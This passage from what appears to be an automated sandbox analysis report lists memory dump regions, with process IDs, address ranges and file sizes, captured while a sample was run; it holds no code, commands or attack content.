                                          • memory/1580-178-0x00000000000E0000-0x0000000000100000-memory.dmp
                                            Filesize

                                            128KB

                                          • memory/1580-177-0x0000000140000000-0x0000000140809000-memory.dmp
                                            Filesize

                                            8.0MB

                                          • memory/1584-121-0x0000000000000000-mapping.dmp
                                          • memory/1584-61-0x000007FEFB541000-0x000007FEFB543000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1584-60-0x000000001BA60000-0x000000001BE7E000-memory.dmp
                                            Filesize

                                            4.1MB

                                          • memory/1584-59-0x00000000000D0000-0x00000000004EE000-memory.dmp
                                            Filesize

                                            4.1MB

                                          • memory/1588-128-0x0000000000000000-mapping.dmp
                                          • memory/1624-105-0x0000000000400000-0x00000000010B6000-memory.dmp
                                            Filesize

                                            12.7MB

                                          • memory/1624-106-0x0000000000400000-0x00000000010B6000-memory.dmp
                                            Filesize

                                            12.7MB

                                          • memory/1624-101-0x0000000000000000-mapping.dmp
                                          • memory/1624-110-0x0000000076CC0000-0x0000000076E69000-memory.dmp
                                            Filesize

                                            1.7MB

                                          • memory/1624-109-0x0000000000400000-0x00000000010B6000-memory.dmp
                                            Filesize

                                            12.7MB

                                          • memory/1624-108-0x0000000076CC0000-0x0000000076E69000-memory.dmp
                                            Filesize

                                            1.7MB

                                          • memory/1632-125-0x0000000000000000-mapping.dmp
                                          • memory/1640-78-0x0000000000000000-mapping.dmp
                                          • memory/1648-122-0x0000000000000000-mapping.dmp
                                          • memory/1668-141-0x0000000000000000-mapping.dmp
                                          • memory/1672-99-0x0000000000000000-mapping.dmp
                                          • memory/1712-88-0x0000000000000000-mapping.dmp
                                          • memory/1740-68-0x00000000024FB000-0x000000000251A000-memory.dmp
                                            Filesize

                                            124KB

                                          • memory/1740-64-0x000007FEED8B0000-0x000007FEEE2D3000-memory.dmp
                                            Filesize

                                            10.1MB

                                          • memory/1740-62-0x0000000000000000-mapping.dmp
                                          • memory/1740-67-0x00000000024F4000-0x00000000024F7000-memory.dmp
                                            Filesize

                                            12KB

                                          • memory/1740-66-0x00000000024F4000-0x00000000024F7000-memory.dmp
                                            Filesize

                                            12KB

                                          • memory/1740-65-0x000007FEECD50000-0x000007FEED8AD000-memory.dmp
                                            Filesize

                                            11.4MB

                                          • memory/1744-148-0x00000000011F0000-0x00000000011F6000-memory.dmp
                                            Filesize

                                            24KB

                                          • memory/1752-118-0x00000000011FB000-0x000000000121A000-memory.dmp
                                            Filesize

                                            124KB

                                          • memory/1752-117-0x00000000011FB000-0x000000000121A000-memory.dmp
                                            Filesize

                                            124KB

                                          • memory/1752-116-0x00000000011F4000-0x00000000011F7000-memory.dmp
                                            Filesize

                                            12KB

                                          • memory/1752-115-0x000007FEEC300000-0x000007FEECE5D000-memory.dmp
                                            Filesize

                                            11.4MB

                                          • memory/1752-114-0x000007FEECE60000-0x000007FEED883000-memory.dmp
                                            Filesize

                                            10.1MB

                                          • memory/1752-112-0x0000000000000000-mapping.dmp
                                          • memory/1756-70-0x0000000000000000-mapping.dmp
                                          • memory/1768-97-0x0000000000000000-mapping.dmp
                                          • memory/1772-69-0x0000000000000000-mapping.dmp
                                          • memory/1792-87-0x0000000000000000-mapping.dmp
                                          • memory/1796-134-0x0000000000000000-mapping.dmp
                                          • memory/1832-90-0x0000000000000000-mapping.dmp
                                          • memory/1836-124-0x0000000000000000-mapping.dmp
                                          • memory/1852-79-0x0000000000000000-mapping.dmp
                                          • memory/1864-84-0x0000000000000000-mapping.dmp
                                          • memory/1872-76-0x0000000000000000-mapping.dmp
                                          • memory/1936-137-0x0000000000000000-mapping.dmp
                                          • memory/1952-75-0x0000000000000000-mapping.dmp
                                          • memory/2000-130-0x0000000000000000-mapping.dmp
                                          • memory/2000-94-0x0000000000000000-mapping.dmp
                                          • memory/2016-138-0x0000000000000000-mapping.dmp
                                          • memory/2016-73-0x0000000000000000-mapping.dmp